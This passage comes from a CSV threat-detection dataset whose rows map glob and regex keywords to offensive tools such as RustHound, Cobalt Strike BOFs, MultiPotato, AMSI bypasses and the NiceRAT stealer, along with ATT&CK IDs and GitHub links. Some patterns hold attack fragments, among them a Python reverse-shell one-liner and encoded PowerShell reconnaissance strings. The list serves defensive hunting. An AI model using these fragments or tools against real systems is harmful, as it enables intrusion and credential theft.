Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound *-ldaps *",".{0,1000}rusthound\s.{0,1000}\-ldaps\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound -c *",".{0,1000}rusthound\s\-c\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound -d *",".{0,1000}rusthound\s\-d\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound rusthound linux*",".{0,1000}rusthound\srusthound\slinux.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound rusthound windows*",".{0,1000}rusthound\srusthound\swindows.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound* --adcs --dc-only*",".{0,1000}rusthound.{0,1000}\s\-\-adcs\s\-\-dc\-only.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound.exe*",".{0,1000}rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*RustHound-main*",".{0,1000}RustHound\-main.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rvazarkar/GMSAPasswordReader*",".{0,1000}rvazarkar\/GMSAPasswordReader.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","160","29","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*Rvn0xsy/Cooolis-ms*",".{0,1000}Rvn0xsy\/Cooolis\-ms.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*rvrsh3ll/BOF_Collection*",".{0,1000}rvrsh3ll\/BOF_Collection.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*rvrsh3ll/TokenTactics*",".{0,1000}rvrsh3ll\/TokenTactics.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA*",".{0,1000}RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A*",".{0,1000}RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*rwxfinder.*",".{0,1000}rwxfinder\..{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","93","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" "*RWXfinder-main*",".{0,1000}RWXfinder\-main.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","93","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" "*RXh0ZXJuYWwgQzIgUG9ydA==*",".{0,1000}RXh0ZXJuYWwgQzIgUG9ydA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*rxwx/cs-rdll-ipc-example*",".{0,1000}rxwx\/cs\-rdll\-ipc\-example.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*RythmStick/AMSITrigger*",".{0,1000}RythmStick\/AMSITrigger.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*'S', 'T', 'A', 'R', 'D', 'U', 'S', 'T', '-', 'E', 'N', 'D'*",".{0,1000}\'S\',\s\'T\',\s\'A\',\s\'R\',\s\'D\',\s\'U\',\s\'S\',\s\'T\',\s\'\-\',\s\'E\',\s\'N\',\s\'D\'.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*'S','e','D','e','b','u','g','P','r','i','v','i','l','e','g','e'*",".{0,1000}\'S\',\'e\',\'D\',\'e\',\'b\',\'u\',\'g\',\'P\',\'r\',\'i\',\'v\',\'i\',\'l\',\'e\',\'g\',\'e\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(*os.dup2(s.fileno*pty.spawn(""/bin/bash*",".{0,1000}s\=socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\)\;s\.connect\(.{0,1000}os\.dup2\(s\.fileno.{0,1000}pty\.spawn\(\""\/bin\/bash.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*s0lst1c3*",".{0,1000}s0lst1c3.{0,1000}","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/s0lst1c3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*s0md3v*",".{0,1000}s0md3v.{0,1000}","offensive_tool_keyword","Github Username","github username hosting offensive tools. mostly for web hacking","N/A","N/A","N/A","N/A","Web Attacks","https://github.com/s0md3v","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*s0md3v*Striker*",".{0,1000}s0md3v.{0,1000}Striker.{0,1000}","offensive_tool_keyword","Striker","Recon & Vulnerability Scanning Suite for web services","T1210.001 - T1190 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/s0md3v/Striker","1","1","N/A","N/A","10","2175","450","2023-06-04T20:15:11Z","2017-10-30T07:08:02Z" "*S12cybersecurity/Admin2Sys*",".{0,1000}S12cybersecurity\/Admin2Sys.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","37","16","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*S12cybersecurity/RDPCredentialStealer*",".{0,1000}S12cybersecurity\/RDPCredentialStealer.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*S1ckB0y1337/TokenPlayer*",".{0,1000}S1ckB0y1337\/TokenPlayer.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*S1lkys/SharpKiller*",".{0,1000}S1lkys\/SharpKiller.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*S3cretP4ssw0rd!*",".{0,1000}S3cretP4ssw0rd!.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*S3cur3Th1sSh1t*",".{0,1000}S3cur3Th1sSh1t.{0,1000}","offensive_tool_keyword","Github Username","Github username of hackr known for exploitation scripts Pentesting. scripting and pwning!","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*S3cur3Th1sSh1t/Amsi-Bypass-Powershell*",".{0,1000}S3cur3Th1sSh1t\/Amsi\-Bypass\-Powershell.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*S3cur3Th1sSh1t/MultiPotato*",".{0,1000}S3cur3Th1sSh1t\/MultiPotato.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*S3cur3Th1sSh1t/PowerSharpPack*",".{0,1000}S3cur3Th1sSh1t\/PowerSharpPack.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*s3scanner -*",".{0,1000}s3scanner\s\-.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*s3scanner dump *",".{0,1000}s3scanner\sdump\s.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*s3scanner scan *",".{0,1000}s3scanner\sscan\s.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*S3Scanner-master*",".{0,1000}S3Scanner\-master.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*s4u.x64.c*",".{0,1000}s4u\.x64\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*s4u.x64.o*",".{0,1000}s4u\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*S4U2self.py*",".{0,1000}S4U2self\.py.{0,1000}","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*S4uDelegator.*",".{0,1000}S4uDelegator\..{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*S4UTomato 1.0.0-beta*",".{0,1000}S4UTomato\s1\.0\.0\-beta.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*S4UTomato.csproj*",".{0,1000}S4UTomato\.csproj.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*S4UTomato.exe*",".{0,1000}S4UTomato\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*S4UTomato.sln*",".{0,1000}S4UTomato\.sln.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*S4UTomato-master*",".{0,1000}S4UTomato\-master.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*S74r77Hr34D(*",".{0,1000}S74r77Hr34D\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*s74r787Hr34D(*",".{0,1000}s74r787Hr34D\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*s7scan*",".{0,1000}s7scan.{0,1000}","offensive_tool_keyword","Github 